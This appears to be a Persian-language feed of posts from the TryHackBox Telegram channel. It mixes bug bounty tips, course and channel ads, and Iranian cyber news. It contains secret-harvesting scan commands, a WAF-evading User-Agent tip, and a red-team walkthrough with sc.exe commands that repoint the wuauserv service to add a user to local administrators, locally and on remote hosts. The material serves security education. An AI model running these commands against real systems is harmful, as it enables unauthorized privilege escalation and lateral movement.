docker run -v $(pwd):/src projectdiscovery/nuclei:latest -l /src/js_links -tags token,tokens -es unknown -rl 500 -c 100 -silent -o /src/secret-results

یا می توانید به جای nuclei از trufflehog استفاده کنید

docker run -v $(pwd):/src secsi/getjs --input /src/alive_http_services --complete --output /src/js_links
docker run -v $(pwd):/src projectdiscovery/httpx:latest -l /src/js_links -t 100 -rl 500 -sr -srd /src/js_response
docker run --rm -it -v "$PWD:/src" trufflesecurity/trufflehog:latest filesystem /src/js_response/response --only-verified --concurrency=50

#bugbounty #tips
@TryHackBox

💬 آیا فکر می کنید در این مورد امکان بایپس 2FA وجود دارد؟ اگر چنین است، چگونه؟

@TryHackBox

https://t.me/+2L2W3Y__rlxjMDQ0


بچها یه چنل زدیم برای کسایی که میخوان وارد دنیای هک و امنیت تست نفوذ وب بشن کسایی که علاقه دارن جوین بشن مطالب خوبی میذاریم هم نقشه راه هم رایتاپ!

کسایی که علاقه دارن جوین شن❤️

دوستان یک سر به کانال های دیگه ما بزنید

⚜ در این کانال ما رودمپ های مختلف را برای شما قرار میدهیم :
⭕ @TryHackBoxOfficial

⚜ داستان های هک کردن را با شما به اشتراک میگذاریم :
⭕ @TryHackBoxStory

#موقت
درود به همه عزیزان!

امروز به دنبال یک ادمین با استعداد و با انگیزه هستم که دارای سطح علمی معادل CEH، SEC504، یا Security+ باشد و با مفاهیم امنیت سایبری آشنایی کافی داشته باشد. اگر شما فردی هستید که می‌توانید به راحتی اطلاعات را به اشتراک بگذارید و فن بیان قوی دارید، ما به شدت به مشارکت شما احتیاج داریم!

من تمامی محتواها را آماده می‌کنم؛ شما تنها کافیست آنها را ضبط کرده و در یوتیوب منتشر کنید. این یک فرصت عالی برای یادگیری و رشد در این حوزه است.

اگر احساس می‌کنید که شرایط مورد نظر را دارید و می‌خواهید بخشی از یک تیم موفق باشید، لطفاً به من پیام دهید!
منتظر پیام‌های شما هستم!
@Unique_exploitbot

🧑‍🎓 خب  دوستان همانطور که میدونید یکی از اهداف کانال ما این بوده که مباحث مقدماتی پوشش بدیم حال قصد داریم با کتاب SEC504 شروع کنیم حالا اگر با pdf راحترید که ترجمه میکنمش میزارم واستون یا با فیلم یا به صورت تکست بگید .

💢 فقط مشکلی که هست که اینه فعلا بخاطر یکسری مشکلات نمیتونم ویدئو رکورد کنم ولی اگر کسی میتونه اعلام کنه من بهش میگم چی یاد بده چی یاد نده البته در اخر Pdf به زبان فارسی گذاشته خواهد شد .

⭕ حال دوستانی که دوست دارند توی ترجمه کتاب کمک کنند توی کامنت ها اعلام کنند یا از طریق بات کانال ما در ارتباط باشند .


🔴 معرفی دوره SEC504 :
طبق دوره
این دوره به شما کمک می‌کند مهارت‌های لازم برای تحقیق در مورد ir را یاد بگیرید. شما می‌آموزید چگونه یک فرآیند پاسخ به حوادث پویا برای تهدیدات سایبری را مدیریت کنید و اطلاعات تهدید را توسعه دهید تا استراتژی‌های دفاعی قوی برای سیستم‌های ابری و محلی ایجاد کنید. در این دوره، آخرین تهدیدات سازمان‌ها مانند حملات phishing و مشکلات امنیتی ایمیل بررسی می‌شود که به شما کمک می‌کند بفهمید هکرها چه می‌کنند و چگونه می‌توانید پیش‌بینی کنید.

با شرکت در این دوره، می‌توانید بفهمید هکرها چگونه به سیستم‌ها نفوذ کرده و ...

راه ارتباطی ما : @Unique_exploitbot

این مورد حتما مطالعه کنید قبل از دیدن رودمپ
https://t.me/TryHackBox/12

دوستان نقشه راه ما برای تست نفوذ شبکه امیدوارم مفید باشه واستون

نقشه راه تست نفوذ شبکه

🔖 یک نکته : به ترتیب نیاز نیست همشو برید این یک نگاه کلی هست که اینایی که داخلش هست رو بلد باشید دوستان .

✍️ Kaveh
@TryHackBoxOfficial

🔖 نکات باگ بانتی

🥷 هنگام استفاده از ffuf یا ابزارهای دیگر (که در هر درخواست یک User-Agent می فرستند)، هیچ کس فکر نمی کند که هدرهای HTTP پیش فرض (Fuzz Faster U Fool در مورد ffuf) می توانند WAF را مسدود کنند. فقط آن را به چیزی شبیه به:

-H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"

#bugbounty #tips #recon
@TryHackBox

۷ آبان ماه، روز کوروش بزرگ
پدر ایران زمین خجسته باد .

دوشنبه (مه‌شید) هفتم، روز امرداد از ماه آبان، روز پدر ایرانشهر، روز کوروش بزرگ، شاه ایران، شاه چهارگوشه، بر هماک بهدینان و نیکان و خوبان ایران و انیران شاد بواد.

@TryHackBox

برای آنکه به بدی و (خساست) شهرت نیابید آنچه را که از آموزگاران خود آموختید با سخاوت و رادی به دیگران عرضه دارید.
«بخشی از نسک سومِ دینکردِ پاک»
@TryHackBox

🔖 40 پورت معمولاً هدفمند توسط هکرها

    🔒 Port 21 (FTP)
    🚪 Port 22 (SSH)
    💻 Port 23 (Telnet)
    📧 Port 25 (SMTP)
    🌐 Port 53 (DNS)
    🌐 Port 80 (HTTP)
    🔒 Port 443 (HTTPS)
    🎮 Port 3074 (Xbox Live)
    📲 Port 5060 (SIP)
    🎲 Port 8080 (Proxy)
    📁 Port 135 (RPC)
    🖥️ Port 139 (NetBIOS)
    🔓 Port 1433 (MSSQL)
    🎲 Port 1521 (Oracle)
    🔓 Port 1723 (PPTP)
    📤 Port 1900 (UPnP)
    🎮 Port 2302 (DayZ)
    🖨️ Port 3389 (RDP)
    🔒 Port 3306 (MySQL)
    🕸️ Port 4000 (Elasticsearch)
    📂 Port 4444 (Metasploit)
    📤 Port 5000 (Python Flask)
    🎮 Port 5555 (Android Debug Bridge)
    📤 Port 5900 (VNC)
    🖥️ Port 6667 (IRC)
    📧 Port 6697 (IRC SSL)
    📂 Port 8000 (HTTP Alt)
    🖥️ Port 8081 (HTTP Proxy)
    🔓 Port 9100 (Printer)
    📂 Port 9090 (Web Debugging)
    📁 Port 445 (SMB)
    💻 Ports 5985/5986 (WinRM)
    🔄 Port 6379 (Redis)
    📂 Port 6666 (IRC)
    📧 Port 993 (IMAP SSL)
    🔒 Port 995 (POP3 SSL)
    🎲 Port 1434 (Microsoft SQL Monitor)
    📂 Port 27017 (MongoDB)
    🌐 Port 28017 (MongoDB HTTP Interface)
#Port
@TryHackBox

#تبلیغات

-خرید اشتراکی دوره ناروتو هانت یاشار-
-مبلغ کل دوره: ۱۶.۰۰۰.۰۰۰تومان
-سهم هر خریدار: ۵۰۰.۰۰۰تومان
کل محتوای دوره بارگزاری شده است و پس از ثبت خرید، به محتوای دوره دسترسی خواهید داشت
جهت همانگی و خرید: @rroohhaaa
@cypack

دوستان اینو یادتون باشه دوره های امنیت با امنیت شروع نمیشه.


@TryHackBox

⭕ دوستان ما قصد داریم کتابهایی رو در زمینه حوزه تهاجمی هست رو ترجمه کنیم برای اینکار تصمیم گرفتیم که یک تیم تشکیل بدیم تا بتوانیم به جامعه سایبری پارسی زبان کمک کنیم و ارائه هایی خوبی برای علاقه مندان داشته باشیم .

✴ اگر دوست دارید کمک کنید و زبان خوبی ندارید میتونید از ترنسلیت استفاده کنید ما در اخر مطالب را ویرایش میکنیم و مطالبی که ترجمه تخصصی نشدند را اصلاح میکنیم .


✳ اگر مایل به پیوستند به تیم ما هستید با ما در ارتباط باشید :

🔆 @Unique_exploitBot

گروه برای سوالات و رفع مشکلات شما :
+ این گروه متصل به کانال هست
https://t.me/+MqmEYDed0gE3YmQ0

آکادمی VSEC - آموزشگاه آنلاین امنیت اطلاعات و ارتباطات

هدف ما :
[+] منشور اخلاقی آکادمی VSEC.
[+] برگزار کننده دوره های آموزشی نیمه آفلاین با محوریت آموزش مهندسی معکوس ، تحلیل بدافزار ، کشف و توسعه آسیب پذیری در پلتفرم ویندوز ( بصورت عمومی و خصوصی ).
[+] آموزش تکنیک و تاکتیک های سایبری به جای رویا فروشی.
[+] رعایت اصول انسانی در فعالیت های سایبری.
[+] ارائه نکات حفاظتی برای علاقه مندان.
[+] آموزش های رایگان در حوزه امنیت اطلاعات.
[+] آموزش های رایگان در خصوص حفظ حریم خصوصی و ایمنی در ارتباطات مجازی.
[+] لیست دوره های آکادمی.
[+] دسترسی به منابع Private.
[+] پشتیبانی رایگان تمام دوره ها تا 6 ماه.

با ما همراه باشید ، همراهی شما با ما ؛ افتخار ماست.
@VSEC_academy

دوستان به زودی یک آموزش جهت راه اندازی لابراتور تست نفوذ شبکه خواهیم داشت برای لینوکس و ویندوز که فکر نمیکنم نیاز باشه چیزی بزارم اینو میدونید چطوری راه اندازی کنید فقط جوین به دامین و .. و حالا eveng یا gns3 خواهیم داشت منتظر باشید ...

نسخه قبلی دوستان گقتند واترمارکش پررنگه تو این نسخه اصلاح شد

📖 مقدمه ای بر امنیت سایبری
🧩 #امنیت_سایبری
✍ توسط : TryHackBox
@TryHackBox

📖 مقدمه ای بر امنیت سایبری
🧩 #امنیت_سایبری
@TryHackBox

یک منبع رایگان برای یادگیری مقدماتی Frida برای دوستانی که در زمینه پنتست اپلیکیشن های موبایل فعالیت دارند:

https://www.mobilehackinglab.com/course/android-frida-labs

@TryHackBoxOfficial

https://urldna.io/

هنری که با خرد همراه نباشد، همچو مرگی که است که بر تن چیره گشته…
«برگرفته از اندرزنامه پهلویِ دستور آذرباد ماراسپندان»
@TryHackBox

از امروز شروع کردم به اماده سازی یکی از دوره های sans احتمالا کتابشو به زودی بزارم ..
منتظر باشید شاید تا اون موقع پستی نزارم

دوستان به زودی فعالیتمون در یوتیوب شروع میشه خوشحال میشم حمایتمون کنید به زودی ...
فعالیتمون در یوتیوب مباحث تست نفوذ شبکه هست

💡آنتی ویروس چگونه کار می کند؟
#Av
@TryHackBox

Pro's vs. Joes @Home Edition Presents: "Building A Monster Lab" w/ Jeff McJunkin

چگونه یک لابراتور برای خودمون بسازیم
#Lab
@TryHackBox

پیکربندی ناامن ACL های سرویس از طریق group policies

سیاست های گروه ابزار محبوبی برای مدیریت متمرکز زیرساخت های مبتنی بر Active Directory هستند. ابزار Group3r به شما امکان می دهد اطلاعاتی را از سیاست های گروه برای تجزیه و تحلیل بعدی جمع آوری کنید. Group3r همچنین برخی از تنظیمات نادرست را برجسته می کند، بنابراین جستجو با استفاده از کلمات کلیدی red و black برای شناسایی مهم ترین نقص ها راحت است. پست امروز درباره پیکربندی ناامن ACL های سرویس از طریق گروپ پالیسی است.

پس از راه اندازی Group3r و بررسی نتایج، خطوط زیر را یافتیم:
A Windows service's ACL is being configured to grant abusable permissions to a target trustee. This should allow local privilege escalation on affected hosts. Service: wuauserv, Trustee: Authenticated Users - S-1-5-11 .

اگر به خود Group Policy بروید، نام سرویس، نوع راه اندازی و تنظیمات حقوق دسترسی را در قالب یک رشته SSDL پیدا می کنیم:
"wuauserv",4,"D:AR(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCDCLCSWRPWPDTLOCRRC;;;AU)(A;;CCLCSWLOCRRC;;;IU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"

ما فقط به گروه AU علاقه مندیم:

- CC -
حقوق درخواست پیکربندی سرویس.
- DC -
حقوق تغییر سرویس.
- LC -
حقوق درخواست وضعیت سرویس ها؛
- SW -
حقوق فهرست کردن تمام خدمات وابسته به سرویس
- RP - حقوق شروع سرویس؛
- WP - حقوق توقف سرویس؛
- DT - حقوق توقف سرویس.
- LO – حقوقی که به شما امکان می دهد از سرویس بخواهید فورا وضعیت شما را گزارش کند.
- CR - حقوق تعیین کد کاربر عنصر کنترل.
- RC - حقوق خواندن توصیفگرهای امنیتی.

ابتدا باید تعیین کنید که این خط مشی گروه روی کدام کامپیوترها اعمال می شود.

MATCH(g:GPO {name:"[email protected]"})-[:GPLink|Contains*1..]->(c:Computer) RETURN c.name

اگر میزبان فعلی ما یا میزبانی که به آن دسترسی راه دور داریم این خط مشی را اعمال می کند، پیکربندی سرویس فعلی را در رایانه محلی پرس و جو می کنیم:

sc.exe qc wuauserv

ما مقدار فعلی پارامتر BINARY_PATH_NAME را برای بازیابی بعدی ذخیره می کنیم.
ما پارامتر BINARY_PATH_NAME را به کاری که می‌خواهیم در رایانه انجام دهیم تغییر می‌دهیم، برای مثال، خود را به گروه مدیران لوکال یا local administrators اضافه می‌کنیم.

sc.exe config wuauserv binPath= "net.exe localgroup administrators victim /add"

سرویس را شروع کنید:

sc.exe start wuauserv

اگر سرویس راه اندازی شده است، ابتدا باید آن را متوقف کنید و سپس آن را شروع کنید:

sc.exe stop wuauserv
sc.exe start wuauserv

در حالی که Group3r گزارش می دهد که این نقص می تواند برای افزایش دسترسی لوکال استفاده شود، در برخی موارد می توان از آن برای افزایش دسترسی از راه دور و lateral movement نیز استفاده کرد.

ما یک بررسی ساده انجام می دهیم، مانند راه اندازی یا نصب یک سرویس در یک میزبان راه دور:

sc.exe \\server start wuauserv

اگر خطای Access Denied ظاهر نشد، بیایید سعی کنیم خود را به گروه مدیران لوکال اضافه کنیم و سرویس را راه اندازی کنیم:

sc.exe \\server config wuauserv binPath= "net.exe localgroup administrators victim /add"
sc.exe \\server start wuauserv

پس از به دست آوردن دسترسی  local administrator، پارامتر BINARY_PATH_NAME را به حالت اولیه خود برگردانید.

#RedTeam #PurpleTeam #LPE
@TryHackBox

Hacking with PowerShell

اصول اولیه PowerShell و PowerShell Scripting را بیاموزید.
#powershell
@TryHackBox

بعد از هک شدن شرکت Tosan که خدمات بانکی ارائه میداد ، و دسترسی هکرها به بیش از 20 بانک کشور دولت را مجبور به پرداخت ۳ میلیون دلار باج به هکرها کرد. گویا این بار گروهی تحت عنوان BlackWolves شرکت مبنا کارت آریا پرداز را هک کرده و دیتاهایی برای سمپل پخش کردند که اطلاعات بیش از 500 نفر از مشتریان این شرکت رو فاش کرد! و خدامیداند که به چه اطلاعاتی دسترسی دارند !!!

هم اکنون دامنه اصلی mcac.ir از دسترس خارج و در حال بروزرسانی است و مهر تاییدی بر این حمله سایبری زده شد .

واقعا مسئولان امنیتی باید فکری به حال امنیت زیر ساخت ها و اطلاعات شخصی مردم باشن وضعیت کنونی تاسف باره 🤦‍♂️

گویا هکری با نام مستعار جاویدان دسترسی ها رو برای این گروه ارسال کرده ، ممکنه از طریق عوامل نفوذی اقدام به هک کرده باشند
#نفوذ
@TryHackBox

Printer Hacking 101

با هک چاپگر آشنا شوید و با آن آشنا شوید و اصول اولیه IPP را بدانید.
#PrinterHacking
@TryHackBox

روابط عمومی سازمان #پدافند_غیرعامل کشور در اطلاعیه اعلام کرد انتشار اخبار مبنی بر اینکه این سازمان اعلامیه‌ای تحت عنوان آماده باش سایبری سطح قرمز برای زیرساخت‌ها منتشر کرده غیرواقعی و جعلی است.

لازم به ذکر است وبگاه مرجع اخبار و اطلاعات سازمان پدافند غیرعامل کشور، پایگاه اطلاع رسانی پایداری ملی به نشانی https://paydarymelli.ir است.

🚨 مرکز افتا در پیامی به این شرح اعلام آماده باش وضعیت سایبری کرد:

باسلام واحترام
اعلام آماده باش سایبری
آماده‌باش قرمز، برای حوزه‌های پولی و مالی و ارتباطات و آماده باش نارنجی برای سایر حوزه‌ها اعلام می‌شود.

باتوجه به احتمال بروزحملات سایبری، لازم است اقدامات زیرانجام و هرگونه رخدادمشکوک سایبری، سریعاً به مرکز افتا اعلام شود:

１-دردسترس بودن وآماده باش متخصصین فنی و سایبری و تیم واکنش سریع بصورت شبانه روزی
2-خد‌ماتی که نیازمند دسترسی بین المللی نیستند، بصورت Iran Access ارائه شوند
3-رابطین پیمانکاران سامانه‌های حیاتی، در دسترس و پاسخگو باشند
4-بر مراجعات و دسترسی پیمانکاران کنترل ونظارت بیشتری اعمال شود
5-پیش از هرگونه قطع یاعدم دسترسی به خدمات الکترونیکی با هدف نگهداری یا به‌ روزرسانی، با مرکز افتا هماهنگی شود
پیرو ابلاغ قبلی به اطلاع می رساند حسب هماهنگی انجام شده با مرکز ملی فضای مجازی، برای همه حوزه‌ها در سراسر کشور تا ۴۸ ساعت آینده، آماده باش سطح قرمز اعلام می‌شود.
منبع

#افتا